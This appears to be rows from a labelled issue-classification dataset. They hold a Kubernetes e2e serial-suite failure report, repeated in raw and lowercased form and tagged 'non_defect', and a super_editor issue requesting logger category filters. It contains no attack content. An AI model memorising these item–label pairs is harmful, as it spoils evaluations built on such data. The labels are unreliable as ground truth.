| Unnamed: 0 (int64: 0–832k) | id (float64: 2.49B–32.1B) | type (string: 1 class) | created_at (string: length 19) | repo (string: lengths 5–112) | repo_url (string: lengths 34–141) | action (string: 3 classes) | title (string: lengths 1–757) | labels (string: lengths 4–664) | body (string: lengths 3–261k) | index (string: 10 classes) | text_combine (string: lengths 96–261k) | label (string: 2 classes) | text (string: lengths 96–232k) | binary_label (int64: 0–1) |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
399,741
| 27,253,665,716
|
IssuesEvent
|
2023-02-22 09:57:35
|
grafana/xk6-redis
|
https://api.github.com/repos/grafana/xk6-redis
|
closed
|
Sync APIs
|
documentation
|
#4 brought async support to most of the [xk6-redis APIs](https://github.com/grafana/xk6-redis#api). Currently, `await` is not supported, so there is no way to interact with Redis synchronously for most APIs.
```javascript
// await is not supported
const counter = await redisClient.get('my_counter');
if (counter > 10) {
// do something in VU code
}
```
I discussed this briefly with @mstoykov and @sniku. It seems that the async APIs do not allow using Redis for some particular use cases.
The main reason is that Promise handlers are always executed after the VU code. Here is one example:
```js
import exec from 'k6/execution';
import { sleep } from 'k6';

export default function () {
  console.log(`before async ${exec.vu.idInTest}`);
  redisClient.incr('my_key').then((total) => {
    // this will only be executed after the VU code finishes
    console.log(`promise callback ${exec.vu.idInTest}`);
  });
  sleep(Math.random() * 5);
  console.log(`exit VU code ${exec.vu.idInTest}`);
}
```
In this case, the execution will always be in this order:
```bash
before async 1
exit VU code 1
promise callback 1
```
With async APIs, the result of a promise cannot change the VU execution flow (outside the promise handler). Users cannot do something like:
```javascript
let localCounter = 0;
redisClient.get('my_counter').then((counter) => {
  localCounter = counter;
});
while (localCounter === 0) {
  // VU will be blocked in this loop.
}
```
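The ordering described above is standard JavaScript microtask semantics, and can be reproduced outside k6 in plain Node.js (a minimal sketch; `iteration` is a hypothetical stand-in for the VU's default function):

```javascript
// Promise handlers are queued as microtasks, which only run after the
// currently executing synchronous code returns -- the same reason a
// .then() callback in k6 cannot interrupt the VU iteration body.
const order = [];

function iteration() {
  order.push('before async');
  Promise.resolve(42).then(() => {
    // Queued immediately, but deferred until iteration() has returned.
    order.push('promise callback');
  });
  order.push('exit VU code');
}

iteration();
console.log(order.join(' -> ')); // before async -> exit VU code
queueMicrotask(() => console.log(order.join(' -> ')));
```

Only the second log, emitted from a microtask itself, observes the `promise callback` entry.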
This issue requests "sync" support for the Redis APIs so as not to limit the potential of using Redis in k6 tests, for example to share data across VUs in a load test.
cc @oleiade
|
1.0
|
Sync APIs - #4 brought async support to most of the [xk6-redis APIs](https://github.com/grafana/xk6-redis#api). Currently, `await` is not supported, so there is no way to interact with Redis synchronously for most APIs.
```javascript
// await is not supported
const counter = await redisClient.get('my_counter');
if (counter > 10) {
// do something in VU code
}
```
I discussed this briefly with @mstoykov and @sniku. It seems that the async APIs do not allow using Redis for some particular use cases.
The main reason is that Promise handlers are always executed after the VU code. Here is one example:
```js
import exec from 'k6/execution';
import { sleep } from 'k6';

export default function () {
  console.log(`before async ${exec.vu.idInTest}`);
  redisClient.incr('my_key').then((total) => {
    // this will only be executed after the VU code finishes
    console.log(`promise callback ${exec.vu.idInTest}`);
  });
  sleep(Math.random() * 5);
  console.log(`exit VU code ${exec.vu.idInTest}`);
}
```
In this case, the execution will always be in this order:
```bash
before async 1
exit VU code 1
promise callback 1
```
With async APIs, the result of a promise cannot change the VU execution flow (outside the promise handler). Users cannot do something like:
```javascript
let localCounter = 0;
redisClient.get('my_counter').then((counter) => {
  localCounter = counter;
});
while (localCounter === 0) {
  // VU will be blocked in this loop.
}
```
This issue requests "sync" support for the Redis APIs so as not to limit the potential of using Redis in k6 tests, for example to share data across VUs in a load test.
cc @oleiade
|
non_defect
|
sync apis brought async support to most of the currently await is not currently supported so there is no way to interact with redis synchronously for most apis javascript await is not supported const counter await redisclient get my counter if counter do something in vu code i discussed this briefly with mstoykov and sniku it seems that async apis does not allow using using redis for some particular cases the main reason is that promise handlers are always executed after the vu code let s show one example js export default function console log before async exec vu idintest redisclient incr my key then total this will only be executed when the vus code finalizes console log promise callback exec vu idintest sleep math random console log exit vu code exec vu idintest in this case the execution will always be in this order bash before async exit vu code promise callback with async apis the result of a promise cannot change the vu execution code outside the promise handler users could not do something like javascript let localcounter redisclient get my counter then counter localcounter counter while localcounter vu will be blocked in this loop this issue requests to provide sync support for redis apis to not limit the potential of using redis in tests for example to share data across vus in your load test cc oleiade
| 0
|
13,296
| 2,750,874,964
|
IssuesEvent
|
2015-04-24 03:37:32
|
heradhis/indonesianadblockrules
|
https://api.github.com/repos/heradhis/indonesianadblockrules
|
closed
|
1
|
auto-migrated Priority-Medium Type-Defect
|
```
On some sites, empty areas will appear on the page; please let me know
if this happens.
```
Original issue reported on code.google.com by `hermawan...@gmail.com` on 17 Apr 2010 at 11:11
|
1.0
|
1 - ```
On some sites, empty areas will appear on the page; please let me know
if this happens.
```
Original issue reported on code.google.com by `hermawan...@gmail.com` on 17 Apr 2010 at 11:11
|
defect
|
pada beberapa situs akan terjadi kekosongan area website tolong bertahu saya jika terjadi hal tersebut original issue reported on code google com by hermawan gmail com on apr at
| 1
|
3,891
| 2,610,083,536
|
IssuesEvent
|
2015-02-26 18:25:30
|
chrsmith/dsdsdaadf
|
https://api.github.com/repos/chrsmith/dsdsdaadf
|
opened
|
Removing whitehead acne in Shenzhen
|
auto-migrated Priority-Medium Type-Defect
|
```
Removing whitehead acne in Shenzhen [Shenzhen Hanfang Keyan national hotline 400-869-1818, 24-hour QQ 4008691818]. Shenzhen Hanfang Keyan is a professional acne-removal chain built around the Korean formula "Hanfang Keyan", a state-licensed therapeutic brand and leading acne remedy. The chain applies secret Korean formulas together with a professional "no rebound" healthy acne-removal technique and an advanced "deluxe photon" device, pioneering contract-guaranteed treatment of pimples and acne in China and successfully clearing the acne of many customers.
```
-----
Original issue reported on code.google.com by `szft...@163.com` on 14 May 2014 at 6:50
|
1.0
|
Removing whitehead acne in Shenzhen - ```
Removing whitehead acne in Shenzhen [Shenzhen Hanfang Keyan national hotline 400-869-1818, 24-hour QQ 4008691818]. Shenzhen Hanfang Keyan is a professional acne-removal chain built around the Korean formula "Hanfang Keyan", a state-licensed therapeutic brand and leading acne remedy. The chain applies secret Korean formulas together with a professional "no rebound" healthy acne-removal technique and an advanced "deluxe photon" device, pioneering contract-guaranteed treatment of pimples and acne in China and successfully clearing the acne of many customers.
```
-----
Original issue reported on code.google.com by `szft...@163.com` on 14 May 2014 at 6:50
|
defect
|
深圳白头粉刺的祛除 深圳白头粉刺的祛除【 , 】深圳韩方科颜专业祛痘连锁机构,机构以韩国�� �方——韩方科颜这一国妆准字号治疗型权威,祛痘佳品,韩� ��科颜专业祛痘连锁机构,采用韩国秘方配合专业“不反弹” 健康祛痘技术并结合先进“先进豪华彩光”仪,开创国内专�� �治疗粉刺、痤疮签约包治先河,成功消除了许多顾客脸上的� ��痘。 original issue reported on code google com by szft com on may at
| 1
|
66,433
| 20,196,564,945
|
IssuesEvent
|
2022-02-11 11:12:25
|
vector-im/element-ios
|
https://api.github.com/repos/vector-im/element-ios
|
opened
|
Message bubbles: horizontal black lines between messages (sometimes)
|
T-Defect
|
### Steps to reproduce
1. Check any room to which different people send messages.
### Outcome
#### What did you expect?
#### What happened instead?
Sometimes you can see black horizontal lines spanning across the whole width in between messages of different people but not between two messages of the same person. See attached screenshot:

### Your phone model
iPhone 8
### Operating system version
iOS 15.3
### Application version
Element 1.8.0
### Homeserver
Synapse 1.52.0
### Will you send logs?
No
|
1.0
|
Message bubbles: horizontal black lines between messages (sometimes) - ### Steps to reproduce
1. Check any room to which different people send messages.
### Outcome
#### What did you expect?
#### What happened instead?
Sometimes you can see black horizontal lines spanning across the whole width in between messages of different people but not between two messages of the same person. See attached screenshot:

### Your phone model
iPhone 8
### Operating system version
iOS 15.3
### Application version
Element 1.8.0
### Homeserver
Synapse 1.52.0
### Will you send logs?
No
|
defect
|
message bubbles horizontal black lines between messages sometimes steps to reproduce check any room to which different people send messages to outcome what did you expect what happened instead sometimes you can see black horizontal lines spanning across the whole width in between messages of different people but not between two messages of the same person see attached screenshot your phone model iphone operating system version ios application version element homeserver synapse will you send logs no
| 1
|
10,502
| 2,622,168,592
|
IssuesEvent
|
2015-03-04 00:13:29
|
byzhang/rapidjson
|
https://api.github.com/repos/byzhang/rapidjson
|
closed
|
fix: dependent names inside templates need to be qualified.
|
auto-migrated Priority-Medium Type-Defect
|
```
Hi, thanks for a great package. I have a suggested fix below. Please have a look.
What steps will reproduce the problem?
1. Compile with clang 3.1
What version of the product are you using? On what operating system?
rapidjson 0.1 (the problem is the same in svn trunk)
Linux, Ubuntu 10.12
Please provide any additional information below.
In the file include/rapidjson/document.h, the ParseStream method (around line 704)
seems to use ill-formed C++ that slips through gcc. My understanding is that
clang is right to reject this: dependent names need template qualification
inside templates, and clang is right to demand that the meaning of these names
be specified more clearly. I suggest changing:
reader.Parse<parseFlags> into
reader.template Parse<parseFlags>
and
this->RawAssign into
RawAssign
This builds correctly with both gcc (4.4) and clang (3.1).
Here's the complete method with those fixes:
template <unsigned parseFlags, typename Stream>
GenericDocument& ParseStream(Stream& stream) {
    ValueType::SetNull(); // Remove existing root if exist
    GenericReader<Encoding> reader;
    if (reader.template Parse<parseFlags>(stream, *this)) {
        RAPIDJSON_ASSERT(stack_.GetSize() == sizeof(ValueType)); // Got one and only one root object
        this->RawAssign(*stack_.template Pop<ValueType>(1));
        parseError_ = 0;
        errorOffset_ = 0;
    }
    else {
        parseError_ = reader.GetParseError();
        errorOffset_ = reader.GetErrorOffset();
        ClearStack();
    }
    return *this;
}
Full compilation error below
----------------------------
dlinux_sdk_896419-80/rapidjson/rapidjson-0.1/rapidjson/include/rapidjson/document.h:708:7: error: reference to non-static member function must be called
    if (reader.Parse<parseFlags>(stream, *this)) {
        ^~~~~~~~~~~~
dlinux_sdk_896419-80/rapidjson/rapidjson-0.1/rapidjson/include/rapidjson/document.h:741:10: note: in instantiation of function template specialization 'rapidjson::GenericDocument<rapidjson::UTF8<char>, rapidjson::MemoryPoolAllocator<rapidjson::CrtAllocator> >::ParseStream<0, rapidjson::GenericStringStream<rapidjson::UTF8<char> > >' requested here
    return ParseStream<parseFlags>(s);
           ^
x.cpp:78:6: note: in instantiation of function template specialization 'rapidjson::GenericDocument<rapidjson::UTF8<char>, rapidjson::MemoryPoolAllocator<rapidjson::CrtAllocator> >::Parse<0>' requested here
    doc.Parse<0>(cfg);
    ^
In file included from y.h:4:
dlinux_sdk_896419-80/rapidjson/rapidjson-0.1/rapidjson/include/rapidjson/document.h:708:19: error: invalid operands to binary expression ('<bound member function type>' and 'unsigned int')
    if (reader.Parse<parseFlags>(stream, *this)) {
        ~~~~~~~~~~~~^~~~~~~~~~~
2 errors generated.
```
Original issue reported on code.google.com by `lundb...@gmail.com` on 18 Oct 2012 at 1:35
* Merged into: #13
|
1.0
|
fix: dependent names inside templates need to be qualified. - ```
Hi, thanks for a great package. I have a suggested fix below. Please have a look.
What steps will reproduce the problem?
1. Compile with clang 3.1
What version of the product are you using? On what operating system?
rapidjson 0.1 (the problem is the same in svn trunk)
Linux, Ubuntu 10.12
Please provide any additional information below.
In the file include/rapidjson/document.h, the ParseStream method (around line 704)
seems to use ill-formed C++ that slips through gcc. My understanding is that
clang is right to reject this: dependent names need template qualification
inside templates, and clang is right to demand that the meaning of these names
be specified more clearly. I suggest changing:
reader.Parse<parseFlags> into
reader.template Parse<parseFlags>
and
this->RawAssign into
RawAssign
This builds correctly with both gcc (4.4) and clang (3.1).
Here's the complete method with those fixes:
template <unsigned parseFlags, typename Stream>
GenericDocument& ParseStream(Stream& stream) {
    ValueType::SetNull(); // Remove existing root if exist
    GenericReader<Encoding> reader;
    if (reader.template Parse<parseFlags>(stream, *this)) {
        RAPIDJSON_ASSERT(stack_.GetSize() == sizeof(ValueType)); // Got one and only one root object
        this->RawAssign(*stack_.template Pop<ValueType>(1));
        parseError_ = 0;
        errorOffset_ = 0;
    }
    else {
        parseError_ = reader.GetParseError();
        errorOffset_ = reader.GetErrorOffset();
        ClearStack();
    }
    return *this;
}
Full compilation error below
----------------------------
dlinux_sdk_896419-80/rapidjson/rapidjson-0.1/rapidjson/include/rapidjson/document.h:708:7: error: reference to non-static member function must be called
    if (reader.Parse<parseFlags>(stream, *this)) {
        ^~~~~~~~~~~~
dlinux_sdk_896419-80/rapidjson/rapidjson-0.1/rapidjson/include/rapidjson/document.h:741:10: note: in instantiation of function template specialization 'rapidjson::GenericDocument<rapidjson::UTF8<char>, rapidjson::MemoryPoolAllocator<rapidjson::CrtAllocator> >::ParseStream<0, rapidjson::GenericStringStream<rapidjson::UTF8<char> > >' requested here
    return ParseStream<parseFlags>(s);
           ^
x.cpp:78:6: note: in instantiation of function template specialization 'rapidjson::GenericDocument<rapidjson::UTF8<char>, rapidjson::MemoryPoolAllocator<rapidjson::CrtAllocator> >::Parse<0>' requested here
    doc.Parse<0>(cfg);
    ^
In file included from y.h:4:
dlinux_sdk_896419-80/rapidjson/rapidjson-0.1/rapidjson/include/rapidjson/document.h:708:19: error: invalid operands to binary expression ('<bound member function type>' and 'unsigned int')
    if (reader.Parse<parseFlags>(stream, *this)) {
        ~~~~~~~~~~~~^~~~~~~~~~~
2 errors generated.
```
Original issue reported on code.google.com by `lundb...@gmail.com` on 18 Oct 2012 at 1:35
* Merged into: #13
|
defect
|
fix dependent names inside templates needs to be qualified hi thanks for a great package i have a suggested fix below please have a look what steps will reproduce the problem compile with clang what version of the product are you using on what operating system rapidjason the problem is the same in svn trunk linux ubuntu please provide any additional information below in the file include rapidjson document h the parsestream method around line seems to use ill defined c which slips through gcc in my understanding is that clang is right to reject this the issue is that dependent names need template qualification inside templates to me clang is right to demand that the meaning of these names be more clearly specified i suggest to change reader parse into reader template parse and this rawassign into rawassign this builds correctly both with gcc and clang here s the complete method with those fixes template genericdocument parsestream stream stream valuetype setnull remove existing root if exist genericreader reader if reader template parse stream this rapidjson assert stack getsize sizeof valuetype got one and only one root object this rawassign stack template pop parseerror erroroffset else parseerror reader getparseerror erroroffset reader geterroroffset clearstack return this full compilation error below dlinux sdk rapidjson rapidjson rapidjson include rapidjson documen t h error reference to non static member function must be called if reader parse stream this dlinux sdk rapidjson rapidjson rapidjson include rapidjson documen t h note in instantiation of function template specialization rapidjson genericdocument rapidjson memorypoolallocator parsestream rapidjson genericstringstream requested here return parsestream s x cpp note in instantiation of function template specialization rapidjson genericdocument rapidjson memorypoolallocator parse requested here doc parse cfg in file included from y h dlinux sdk rapidjson rapidjson rapidjson include rapidjson documen t h 
error invalid operands to binary expression and unsigned int if reader parse stream this errors generated original issue reported on code google com by lundb gmail com on oct at merged into
| 1
|
266,515
| 23,243,588,694
|
IssuesEvent
|
2022-08-03 17:50:17
|
microsoft/vscode-python
|
https://api.github.com/repos/microsoft/vscode-python
|
closed
|
Display names of parameterized tests in test explorer
|
feature-request area-testing needs proposal
|
Assume we have a parameterized test `test_adding_numbers(a, b)`.
We have parameters `[1,2], [2,4], [4,9]`
The UI will display the nodes as follows:
<img width="405" alt="Screen Shot 2019-03-14 at 4 35 31 PM" src="https://user-images.githubusercontent.com/1948812/54398438-3ffb5800-4677-11e9-8aaa-2c3a4aa0c29b.png">
Personally, I believe it should be altered to display just the parameters in the child nodes.
That is, why repeat the function name in the child nodes? We're testing different parameters, and as a user that's what I would like to see.
Here's the improved version:
<img width="460" alt="Screen Shot 2019-03-14 at 4 39 53 PM" src="https://user-images.githubusercontent.com/1948812/54398569-d3cd2400-4677-11e9-8b4d-d458746e66f3.png">
/cc @luabud
More examples of before and after with a larger test base (`pytest` repo):
<img width="464" alt="Screen Shot 2019-03-14 at 4 44 49 PM" src="https://user-images.githubusercontent.com/1948812/54398731-843b2800-4678-11e9-86bd-73c2781fb12d.png">
<img width="397" alt="Screen Shot 2019-03-14 at 4 43 07 PM" src="https://user-images.githubusercontent.com/1948812/54398737-88674580-4678-11e9-8ca3-53b8c77e17cc.png">
<img width="493" alt="Screen Shot 2019-03-14 at 4 42 58 PM" src="https://user-images.githubusercontent.com/1948812/54398742-90bf8080-4678-11e9-8e35-219bea4e5eb2.png">
|
1.0
|
Display names of parameterized tests in test explorer - Assume we have a parameterized test `test_adding_numbers(a, b)`.
We have parameters `[1,2], [2,4], [4,9]`
The UI will display the nodes as follows:
<img width="405" alt="Screen Shot 2019-03-14 at 4 35 31 PM" src="https://user-images.githubusercontent.com/1948812/54398438-3ffb5800-4677-11e9-8aaa-2c3a4aa0c29b.png">
Personally, I believe it should be altered to display just the parameters in the child nodes.
That is, why repeat the function name in the child nodes? We're testing different parameters, and as a user that's what I would like to see.
Here's the improved version:
<img width="460" alt="Screen Shot 2019-03-14 at 4 39 53 PM" src="https://user-images.githubusercontent.com/1948812/54398569-d3cd2400-4677-11e9-8b4d-d458746e66f3.png">
/cc @luabud
More examples of before and after with a larger test base (`pytest` repo):
<img width="464" alt="Screen Shot 2019-03-14 at 4 44 49 PM" src="https://user-images.githubusercontent.com/1948812/54398731-843b2800-4678-11e9-86bd-73c2781fb12d.png">
<img width="397" alt="Screen Shot 2019-03-14 at 4 43 07 PM" src="https://user-images.githubusercontent.com/1948812/54398737-88674580-4678-11e9-8ca3-53b8c77e17cc.png">
<img width="493" alt="Screen Shot 2019-03-14 at 4 42 58 PM" src="https://user-images.githubusercontent.com/1948812/54398742-90bf8080-4678-11e9-8e35-219bea4e5eb2.png">
|
non_defect
|
display names of parameterized tests in test explorer assume we have a pamraterized test test adding numbers a b we have parameters the ui will display the nodes as follows img width alt screen shot at pm src personally i believe it needs to be altered to display just the parameters in the child nodes i e why repeat the function name in the child nodes we re testing different parameters and as a user that s what i would like to see here s the improved version img width alt screen shot at pm src cc luabud more examples of before and after with a larger test base pytest repo img width alt screen shot at pm src img width alt screen shot at pm src img width alt screen shot at pm src
| 0
|
56,691
| 15,300,358,924
|
IssuesEvent
|
2021-02-24 12:12:29
|
radon-h2020/radon-defect-prediction-plugin
|
https://api.github.com/repos/radon-h2020/radon-defect-prediction-plugin
|
closed
|
R-T3.4-8: The defect-prediction tool must provide filters to decide which predefined defects to find
|
Defect prediction IDE MUST WP3
|
ID | R-T3.4-8
-- | --
Section | WP3: Methodology and Quality Assurance Requirements
Type | USABILITY
User Story | As an Operations Engineer I want to be able to search for specific defects
Requirement | The defect-prediction tool must provide filters to decide which predefined defects to find
Extended Description | The user should be able to filter which predefined defects are to be found
Priority | Must have
Affected Tools | DEFECT_PRED_TOOL
Means of Verification | Direct implementation on IDE, feature checklist, case-study
Dependency | R-T3.4-1 https://github.com/radon-h2020/radon-defect-prediction-api/issues/2 (could use) <br> R-T3.4-2 https://github.com/radon-h2020/radon-defect-prediction-api/issues/4 (could use) <br> R-T3.4-3 https://github.com/radon-h2020/radon-defect-prediction-api/issues/3 (could use)
|
1.0
|
R-T3.4-8: The defect-prediction tool must provide filters to decide which predefined defects to find - ID | R-T3.4-8
-- | --
Section | WP3: Methodology and Quality Assurance Requirements
Type | USABILITY
User Story | As an Operations Engineer I want to be able to search for specific defects
Requirement | The defect-prediction tool must provide filters to decide which predefined defects to find
Extended Description | The user should be able to filter which predefined defects are to be found
Priority | Must have
Affected Tools | DEFECT_PRED_TOOL
Means of Verification | Direct implementation on IDE, feature checklist, case-study
Dependency | R-T3.4-1 https://github.com/radon-h2020/radon-defect-prediction-api/issues/2 (could use) <br> R-T3.4-2 https://github.com/radon-h2020/radon-defect-prediction-api/issues/4 (could use) <br> R-T3.4-3 https://github.com/radon-h2020/radon-defect-prediction-api/issues/3 (could use)
|
defect
|
r the defect prediction tool must provide filters to decide which predefined defects to find id r section methodology and quality assurance requirements type usability user story as an operations engineer i want to be able to find for specific defects requirement the defect prediction tool must provide filters to decide which predefined defects to find extended description the user should be able to filter which predefined defects are to be found priority must have affected tools defect pred tool means of verification direct implementation on ide feature checklist case study dependency r could use r could use r could use
| 1
|
65,342
| 19,412,062,741
|
IssuesEvent
|
2021-12-20 10:41:19
|
vector-im/element-android
|
https://api.github.com/repos/vector-im/element-android
|
closed
|
Emojis still crashing on Android versions below 9.0 / P / API 28
|
T-Defect Z-Crash A-Timeline S-Critical O-Occasional
|
### Steps to reproduce
1. On a device running android 8.1.1 or below, with play services enabled
2. Open a room with the :face_exhaling: emoji
### Outcome
#### What did you expect?
No crash
#### What happened instead?
We're still seeing #4691 however it's limited to android versions below 9.0 / P / API 28
```
Thread: main, Exception: java.lang.IllegalArgumentException: MetricAffectingSpan can not be set to PrecomputedText.
at androidx.core.text.PrecomputedTextCompat.setSpan(PrecomputedTextCompat.java:5)
at androidx.emoji2.text.EmojiCompat$CompatInternal19.process(EmojiCompat.java:51)
at androidx.emoji2.text.EmojiCompat.process(EmojiCompat.java:12)
at androidx.emoji2.viewsintegration.EmojiInputFilter.filter(EmojiInputFilter.java:8)
at android.widget.TextView.setText(TextView.java:4996)
at android.widget.TextView.setText(TextView.java:4962)
at android.widget.TextView.setText(TextView.java:4937)
at androidx.core.widget.TextViewCompat.setPrecomputedText(TextViewCompat.java:8)
```
### Your phone model
_No response_
### Operating system version
_No response_
### Application version and app store
_No response_
### Homeserver
N/A
### Will you send logs?
No
|
1.0
|
Emojis still crashing on Android versions below 9.0 / P / API 28 - ### Steps to reproduce
1. On a device running android 8.1.1 or below, with play services enabled
2. Open a room with the :face_exhaling: emoji
### Outcome
#### What did you expect?
No crash
#### What happened instead?
We're still seeing #4691 however it's limited to android versions below 9.0 / P / API 28
```
Thread: main, Exception: java.lang.IllegalArgumentException: MetricAffectingSpan can not be set to PrecomputedText.
at androidx.core.text.PrecomputedTextCompat.setSpan(PrecomputedTextCompat.java:5)
at androidx.emoji2.text.EmojiCompat$CompatInternal19.process(EmojiCompat.java:51)
at androidx.emoji2.text.EmojiCompat.process(EmojiCompat.java:12)
at androidx.emoji2.viewsintegration.EmojiInputFilter.filter(EmojiInputFilter.java:8)
at android.widget.TextView.setText(TextView.java:4996)
at android.widget.TextView.setText(TextView.java:4962)
at android.widget.TextView.setText(TextView.java:4937)
at androidx.core.widget.TextViewCompat.setPrecomputedText(TextViewCompat.java:8)
```
### Your phone model
_No response_
### Operating system version
_No response_
### Application version and app store
_No response_
### Homeserver
N/A
### Will you send logs?
No
|
defect
|
emojis still crashing on android versions below p api steps to reproduce on a device running android or below with play services enabled open a room with the face exhaling emoji outcome what did you expect no crash what happened instead we re still seeing however it s limited to android versions below p api thread main exception java lang illegalargumentexception metricaffectingspan can not be set to precomputedtext at androidx core text precomputedtextcompat setspan precomputedtextcompat java at androidx text emojicompat process emojicompat java at androidx text emojicompat process emojicompat java at androidx viewsintegration emojiinputfilter filter emojiinputfilter java at android widget textview settext textview java at android widget textview settext textview java at android widget textview settext textview java at androidx core widget textviewcompat setprecomputedtext textviewcompat java your phone model no response operating system version no response application version and app store no response homeserver n a will you send logs no
| 1
|
46,863
| 13,055,991,454
|
IssuesEvent
|
2020-07-30 03:19:38
|
icecube-trac/tix2
|
https://api.github.com/repos/icecube-trac/tix2
|
opened
|
[docs] switch to python-based documentation builder (Trac #2025)
|
Incomplete Migration Migrated from Trac analysis defect
|
Migrated from https://code.icecube.wisc.edu/ticket/2025
```json
{
"status": "closed",
"changetime": "2019-02-13T14:13:57",
"description": "speed up documentation build by switching to python-based doc builder `docs-build`. Use the `-jN` option on multicore systems. this is in its own project which was added to combo \nhttp://code.icecube.wisc.edu/icetray/projects/docs/trunk",
"reporter": "kjmeagher",
"cc": "",
"resolution": "fixed",
"_ts": "1550067237750774",
"component": "analysis",
"summary": "[docs] switch to python-based documentation builder",
"priority": "normal",
"keywords": "",
"time": "2017-05-18T07:11:18",
"milestone": "",
"owner": "nega",
"type": "defect"
}
```
|
1.0
|
[docs] switch to python-based documentation builder (Trac #2025) - Migrated from https://code.icecube.wisc.edu/ticket/2025
```json
{
"status": "closed",
"changetime": "2019-02-13T14:13:57",
"description": "speed up documentation build by switching to python-based doc builder `docs-build`. Use the `-jN` option on multicore systems. this is in its own project which was added to combo \nhttp://code.icecube.wisc.edu/icetray/projects/docs/trunk",
"reporter": "kjmeagher",
"cc": "",
"resolution": "fixed",
"_ts": "1550067237750774",
"component": "analysis",
"summary": "[docs] switch to python-based documentation builder",
"priority": "normal",
"keywords": "",
"time": "2017-05-18T07:11:18",
"milestone": "",
"owner": "nega",
"type": "defect"
}
```
|
defect
|
switch to python based documentation builder trac migrated from json status closed changetime description speed up documentation build by switching to python based doc builder docs build use the jn option on multicore systems this is in its own project which was added to combo n reporter kjmeagher cc resolution fixed ts component analysis summary switch to python based documentation builder priority normal keywords time milestone owner nega type defect
| 1
|
44,015
| 11,903,717,227
|
IssuesEvent
|
2020-03-30 15:44:23
|
department-of-veterans-affairs/va.gov-team
|
https://api.github.com/repos/department-of-veterans-affairs/va.gov-team
|
opened
|
[CI/CD]: Review coverage of accessibility checks in pre-need end-to-end tests
|
508-defect-3 508/Accessibility testing
|
**Feedback framework**
- **❗️ Must** if the feedback must be applied
- **⚠️Should** if the feedback is best practice
- **✔️ Consider** for suggestions/enhancements
## Description
Applications **must** have thorough end-to-end tests that run in our continuous integration/continuous deployment (CI/CD) pipeline. While reviewing the `/pre-need` application, I noticed we should open one accordion on the review page before running our axe check. I'd like the front-end engineering team to review and update this test for better coverage. Definition of done in acceptance criteria below.
## Point of Contact
<!-- If this issue is being opened by a VFS team member, please add a point of contact. Usually this is the same person who enters the issue ticket.
-->
**VFS Point of Contact:** _Jennifer_
## Environment
* `vets-website/src/applications/pre-need/tests`
* `$ yarn test:e2e src/applications/pre-need/tests`
## Acceptance Criteria
<!-- As a keyboard user, I want to open the Level of Coverage widget by pressing Spacebar or pressing Enter. These keypress actions should not interfere with the mouse click event also opening the widget. -->
**Definition of done:**
- [ ] Front-end team member(s) have reviewed end-to-end tests for axe checks
- [ ] Ensure one accordion is open on the review page before running an axe check
- [ ] FE team has consulted with accessibility specialist in cases where there are high numbers of modals, accordions, other hidden content that could slow down e2e test runs.
- [ ] No axe `violations` appear in the plugin console. These will break the CI/CD build.
## WCAG or Vendor Guidance (optional)
* [Custom axeCheck helper method](https://github.com/department-of-veterans-affairs/vets-website/blob/master/src/platform/testing/e2e/nightwatch-commands/axeCheck.js)
* [VSP guidance on writing end-to-end tests](https://github.com/department-of-veterans-affairs/va.gov-team/tree/master/platform/quality-assurance/e2e-testing)
|
1.0
|
[CI/CD]: Review coverage of accessibility checks in pre-need end-to-end tests - **Feedback framework**
- **⚠️ Should** if the feedback is best practice
- **⚠️Should** if the feedback is best practice
- **✔️ Consider** for suggestions/enhancements
## Description
Applications **must** have thorough end-to-end tests that run in our continuous integration/continuous deployment (CI/CD) pipeline. While reviewing the `/pre-need` application, I noticed we should open one accordion on the review page before running our axe check. I'd like the front-end engineering team to review and update this test for better coverage. Definition of done in acceptance criteria below.
## Point of Contact
<!-- If this issue is being opened by a VFS team member, please add a point of contact. Usually this is the same person who enters the issue ticket.
-->
**VFS Point of Contact:** _Jennifer_
## Environment
* `vets-website/src/applications/pre-need/tests`
* `$ yarn test:e2e src/applications/pre-need/tests`
## Acceptance Criteria
<!-- As a keyboard user, I want to open the Level of Coverage widget by pressing Spacebar or pressing Enter. These keypress actions should not interfere with the mouse click event also opening the widget. -->
**Definition of done:**
- [ ] Front-end team member(s) have reviewed end-to-end tests for axe checks
- [ ] Ensure one accordion is open on the review page before running an axe check
- [ ] FE team has consulted with accessibility specialist in cases where there are high numbers of modals, accordions, other hidden content that could slow down e2e test runs.
- [ ] No axe `violations` appear in the plugin console. These will break the CI/CD build.
## WCAG or Vendor Guidance (optional)
* [Custom axeCheck helper method](https://github.com/department-of-veterans-affairs/vets-website/blob/master/src/platform/testing/e2e/nightwatch-commands/axeCheck.js)
* [VSP guidance on writing end-to-end tests](https://github.com/department-of-veterans-affairs/va.gov-team/tree/master/platform/quality-assurance/e2e-testing)
|
defect
|
review coverage of accessibility checks in pre need end to end tests feedback framework ❗️ must for if the feedback must be applied ⚠️should if the feedback is best practice ✔️ consider for suggestions enhancements description applications must have thorough end to end tests that run in our continuous integration continuous deployment ci cd pipeline while reviewing the pre need application i noticed we should open one accordion on the review page before running our axe check i d like the front end engineering team to review and update this test for better coverage definition of done in acceptance criteria below point of contact if this issue is being opened by a vfs team member please add a point of contact usually this is the same person who enters the issue ticket vfs point of contact jennifer environment vets website src applications pre need tests yarn test src applications pre need tests acceptance criteria definition of done front end team member s have reviewed end to end tests for axe checks ensure one accordion is open on the review page before running an axe check fe team has consulted with accessibility specialist in cases where there are high numbers of modals accordions other hidden content that could slow down test runs no axe violations appear in the plugin console these will break the ci cd build wcag or vendor guidance optional
| 1
|
Record 178,926 | id 6,620,215,363 | IssuesEvent | 2017-09-21 14:52:06
repo: spring-projects/spring-boot (https://api.github.com/repos/spring-projects/spring-boot)
action: closed | labels: priority: normal theme: datasource type: enhancement
title: Add a generic to `DataSourceBuilder`
label: non_defect (binary_label: 0)
body:
To be able to derive the actual type of the `DataSource` rather than a raw `DataSource`.

Record 4,341 | id 2,610,091,950 | IssuesEvent | 2015-02-26 18:27:47
repo: chrsmith/dsdsdaadf (https://api.github.com/repos/chrsmith/dsdsdaadf)
action: opened | labels: auto-migrated Priority-Medium Type-Defect
title: How to remove acne in Shenzhen (深圳粉刺如何祛除)
label: defect (binary_label: 1)
body:
```
